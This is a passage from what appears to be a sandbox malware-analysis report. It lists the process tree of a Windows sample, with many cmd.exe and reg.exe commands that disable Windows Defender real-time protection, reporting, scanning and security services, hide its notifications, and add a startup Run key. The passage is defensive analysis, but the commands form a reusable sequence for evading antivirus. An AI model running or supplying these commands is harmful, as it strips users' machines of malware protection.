  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /f"
  2⤵
  PID:4020
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /f
    3⤵
    PID:8656
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /f"
  2⤵
  PID:8116
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /f
    3⤵
    PID:2656
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f"
  2⤵
  PID:4724
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5536
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /f"
  2⤵
  PID:8644
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7976
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /f
    3⤵
    PID:4160
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:8640
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 3 /f
    3⤵
    PID:6940
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
  2⤵
  PID:4320
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:9008
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
    3⤵
    - Modifies security service
    PID:8444
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:7228
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:8648
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:8832
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies Security services
    PID:8968
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:3508
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:9012
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Security services
    PID:5896
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:5408
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Security services
    PID:2356
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:6100
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies Security services
    PID:7368
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:1080
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies Security services
    PID:3120
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:4532
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
    3⤵
    PID:5148
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:6752
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 1 /f
    3⤵
    PID:7268
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - System Location Discovery: System Language Discovery
  PID:6836
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
    3⤵
    - Modifies registry key
    PID:6452
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /t REG_EXPAND_SZ /d %%windir%%\system32\SecurityHealthSystray.exe /f
  2⤵
  PID:4160
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /t REG_EXPAND_SZ /d %C:\Windows%\system32\SecurityHealthSystray.exe /f
    3⤵
    - Adds Run key to start application
    PID:5404
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SYSTEMROOT%\System32\OneDriveSetup.exe
  2⤵
  PID:8000
- - C:\Windows\SysWOW64\OneDriveSetup.exe
    C:\Windows\System32\OneDriveSetup.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5676
  - - C:\Windows\SysWOW64\OneDriveSetup.exe
      "C:\Windows\SysWOW64\OneDriveSetup.exe" C:\Windows\SysWOW64\OneDriveSetup.exe /permachine /childprocess /silent /enableOMCTelemetry /enableExtractCabV2 /cusid:S-1-5-21-3442511616-637977696-3186306149-1000
      4⤵
      System Location Discovery: System Language Discovery
      PID:1832
  - - C:\Windows\SysWOW64\OneDriveSetup.exe
      C:\Windows\SysWOW64\OneDriveSetup.exe /peruser /childprocess /enableOMCTelemetry /enableExtractCabV2
      4⤵
      Modifies system executable filetype association
      Drops file in System32 directory
      Modifies Internet Explorer settings
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6392
    - - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileSyncConfig.exe
        
        "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileSyncConfig.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops desktop.ini file(s)
        Modifies registry class
        
        PID:9100
    - - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
        
        /updateInstalled /background
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system executable filetype association
        Checks system information in the registry
        Checks processor information in registry
        Modifies Internet Explorer settings
        Modifies registry class
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SystemRoot%\SysWOW64\OneDriveSetup.exe
  2⤵
  PID:3920
- - C:\Windows\SysWOW64\OneDriveSetup.exe
    C:\Windows\SysWOW64\OneDriveSetup.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6784
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3128
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f
    3⤵
    PID:9752
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:3276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:10000
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:4748
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:9936
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:5468
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9192
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f"
  2⤵
  PID:5180
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
    3⤵
    PID:10052
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f"
  2⤵
  PID:8364
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f
    3⤵
    PID:9852
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7756
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f
    3⤵
    PID:10200
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
  2⤵
  PID:6436
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6096
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:9484
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
  2⤵
  PID:8344
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
    3⤵
    PID:9744
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f"
  2⤵
  PID:1084
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f
    3⤵
    PID:10588
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:8952
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:10212
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f"
  2⤵
  PID:5544
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9592
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4544
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f
    3⤵
    PID:10696
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f"
  2⤵
  PID:8236
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f
    3⤵
    PID:9764
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f"
  2⤵
  PID:6460
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
    3⤵
    PID:9760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5208
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:11012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:336
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9536
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:2552
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    PID:9668
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:6000
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:9492
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"
  2⤵
  PID:5644
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
    3⤵
    PID:9696
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
  2⤵
  PID:6556
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    PID:9812
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f"
  2⤵
  PID:6132
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
    3⤵
    PID:9868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"
  2⤵
  PID:8672
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:9600
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:368
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:9584
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:2996
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:9400
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:5896
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:9624
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2404
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:9508
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:7372
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:9736
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:5080
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:10064
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f"
  2⤵
  PID:8456
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f
    3⤵
    PID:10680
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:3460
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f
    3⤵
    PID:3000
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f"
  2⤵
  PID:8920
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f
    3⤵
    PID:9884
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:5904
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f
    3⤵
    PID:11168
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:9004
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f
    3⤵
    PID:9500
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:4296
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f
    3⤵
    PID:10348
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:5460
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f
    3⤵
    PID:10112
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f"
  2⤵
  PID:8928
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f
    3⤵
    PID:10076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:3564
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f
    3⤵
    PID:10908
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f"
  2⤵
  PID:2860
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f
    3⤵
    PID:10872
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:4508
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5964
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:11252
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f"
  2⤵
  PID:3672
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f
    3⤵
    PID:9604
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f"
  2⤵
  PID:8408
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f
    3⤵
    PID:9956
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:6572
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:11196
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:5472
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:11232
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f"
  2⤵
  PID:7636
- - C:\Windows\SysWOW64\reg.exe
